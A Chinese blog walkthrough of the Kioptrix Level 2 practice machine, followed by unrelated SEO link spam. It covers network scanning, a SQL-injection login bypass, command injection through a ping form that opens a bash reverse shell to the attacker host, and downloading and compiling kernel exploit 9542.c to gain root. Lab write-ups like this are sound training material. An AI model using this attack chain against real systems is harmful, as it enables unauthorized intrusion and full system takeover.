当前位置: 首页 > wzjs >正文

零基础学做网站电子商务主要干什么

零基础学做网站,电子商务主要干什么,熊岳网站在哪做,wordpress 通配符替换为什么审核一直不通过啊,这是靶机练习啊,为什么为什么为什么 探测目标IP arp-scan -l 得出目标IP:192.168.155.164 也可以使用 netdiscover -i eth0 -r 192.168.155.0/24 端口扫描 nmap -sV -sT --min-rate 1000 -p1-65535 IP 结果如下&a…

为什么审核一直不通过啊,这是靶机练习啊,为什么为什么为什么

探测目标IP

arp-scan -l


得出目标IP:192.168.155.164
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果如下:

└─$ nmap -sV -sT --min-rate 1000  -p1-65535 192.168.155.164
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 20:55 EDT
Nmap scan report for 192.168.155.164
Host is up (0.0034s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
738/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)


80端口

访问一下,开局一个登录框


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.164 -e *


访问http://192.168.155.164/manual/index.html
apache页面,好像用处不大
回到登录框
端口开启有3306数据库
尝试SQL:
 

admin' or 1=1 #


进入后台,好像又空白了,但是网站嘛,查看源码一下


发现被注释掉的一部分源码
要恢复页面,bp抓返回包,去掉引号再放开,发现页面恢复正常了


网站执行Ping命令,很容易想到代码执行漏洞
试试看:

192.168.155.142;ls


回显显示出结果:index.php、pingit.php

kali开启监听:

nc -lvvp 9001


反弹shell:

192.168.155.142;sh -i >& /dev/tcp/192.168.155.142/9001 0>&1


查看kali,有结果了


查看id,显示:

uid=48(apache) gid=48(apache) groups=48(apache)


普通用户需要提权
查看系统版本:

uname -a


显示:

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


查看详细的发行版系统版本信息:

cat /etc/*-release


查找版本漏洞:
 

searchsploit linux 2.6 centos 4.5


下载:

searchsploit -m 9542.c 


查看要求:

vim 9542.c 


因为要求将Poc下载到靶机里,我们通过反弹的shell实现
上kali机去开启一下服务:

python -m http.server 80


回到连接靶机,下载脚本:

cd /tmp
wget http://192.168.155.142/9542.c
ls


编译文件:

gcc 9542.c -o exploit
./exploit
whoami


权限是root了,大功告成

 

http://www.dtcms.com/wzjs/341396.html

相关文章:

  • 北京建设发展委员会网站百度写作助手
  • 国内室内设计网站大全北京网站seo服务
  • 公司网站制作效果线下推广方法有哪些
  • 郑州网页制作案例教程东莞百度seo排名
  • emlog转换wordpressseo免费优化软件
  • wordpress 个人资料seo行业岗位有哪些
  • 做网站合同网址缩短
  • ftp怎么重新上传网站济南seo外包服务
  • 网站推广与seo的区别百度推广话术全流程
  • 制作投票的网站中国站长之家
  • 认识电子商务网站建设技术网站排名软件推荐
  • 电商创业项目有哪些如何网页优化
  • 如何建设优化一个网站外包公司
  • 元谋县住房和城乡建设局网站南阳seo
  • wordpress网站怎么建设域名查询平台
  • 眉山 网站开发百度网站推广教程
  • 建网站做商城个体户资质可以新产品推广方式有哪些
  • 怎么自己做网站链接关键词优化的原则
  • 建站技巧凡科网小程序
  • 创建网站为啥要钱长沙做网络推广公司的
  • 怎么使用服务器做网站营销策划书格式及范文
  • 可以做go分析的网站长沙靠谱seo优化
  • 泉州专业网站营销昆明seo培训
  • 苏州行业网站建设服务自助建站系统个人网站
  • 网站核验为个人实际是公司深圳网站seo推广
  • 国外好的电商网站有哪些服装市场调研报告范文
  • 空调维修网站建设最近发生的热点新闻
  • 最牛的设计网站建设新产品怎样推广
  • 2019年长春网站建设最新价格表网站怎么进入
  • 网站广告策划seo关键词平台